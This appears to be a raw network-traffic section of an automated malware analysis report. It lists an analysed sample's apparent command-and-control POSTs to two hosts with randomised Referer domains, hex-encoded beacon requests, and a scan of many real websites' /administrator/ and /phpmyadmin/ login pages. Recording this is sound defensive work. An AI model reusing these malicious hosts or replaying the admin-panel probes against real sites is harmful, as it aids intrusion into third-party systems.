Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ygdskxvclfbimxph.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://prqgcnfmgih.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://advoxwggvvvcod.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rquwvlghqdtvnmba.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hypfqvnvsca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://etdyxanscapwx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fcbfgqcrflouurm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rrvwuynafikwa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nnfrlgvehwypac.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hdcomaimwbbsqc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://frwlkmyukbxd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wpbmtprveeaxdh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ashmoiuhqxsn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jinemgyvlvdj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: sjyey.com
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef715c7ee919933 HTTP/1.1Host: bvstlyb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qmnuclxpjckjuyq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lsckaqywvhcwxr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://srvjnognnjjqc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dtlxqtnkjrmqpli.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aqrcjsxbrdnmgfud.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sxqvjhdkwrjy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://onstoqiexcmkx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://veqijasajwy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: sjyey.com
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qpbqyfrqjmdtwe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wltdgnqwdyxfpcbj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: sjyey.com
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef715c7ee919933 HTTP/1.1Host: bvstlyb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: protonmail.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ef968548815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef9d9e3ccc6b951e HTTP/1.1Host: bvstlyb.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix"User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://att.com.au/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: derbyron.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: fortressrealcapital.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: mwpmedia.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: acidvision.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: touktoukcie.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.sgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: wefttechnologies.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: art-paix-di.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: d-brinkmann.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: caspiantravel.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: mlbx.matrix.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: sportclinic.co.ilAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: veselcontractors.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: imailzone.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cpsgroupe.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: veselcontractors.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://veselcontractors.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: wilsonfamilyinsurance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: iisalessandrini.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: publichouse.ieAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.twAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: att.com.twAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: touktoukcie.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://touktoukcie.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: sportclinic.co.ilAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://sportclinic.co.il/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: imailzone.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: derbyron.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://derbyron.de/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: waukesha-water.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: art-paix-di.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://art-paix-di.org/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: glazing-bt.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: schussundtor.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: d-brinkmann.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://d-brinkmann.de/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: markoren.noAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: caspiantravel.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: publichouse.ieAccept: /Accept-Encoding: deflate, gzipCookie: crumb=BejL2LT8df0oZDhjMTJjMWIyMTBiYmViMDRjODkzYTJkMWVlZWNiUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: voltage-distribution.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: creativ-moebelwerkstaetten.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: braekling.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: iisalessandrini.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cfca.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: mlbx.matrix.jpAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mlbx.matrix.jp/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: schussundtor.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ksv-schwimmen.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: popular.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: collevilca.itAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://collevilca.it/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://att.com.hk/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipCookie: __tad=1708471566.1447398User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hotmail.fr.au/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipCookie: __tad=1708471566.1141811User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://hotmail.fr.au/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: network-abilities.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://network-abilities.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: cpsgroupe.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://cpsgroupe.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: wefttechnologies.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://wefttechnologies.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: wilsonfamilyinsurance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://wilsonfamilyinsurance.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: att.com.phAccept: /Accept-Encoding: deflate, gzipCookie: sid=6bfceafb-d047-11ee-9fdb-b2ef13fb2d8aUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://att.com.ph/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: schussundtor.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: att.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: archononline.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: netzschnipsel.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: norwegischlernen.infoAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: upblue.deAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hotmail.fr.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: amsantechnology.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: strategicimpact.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
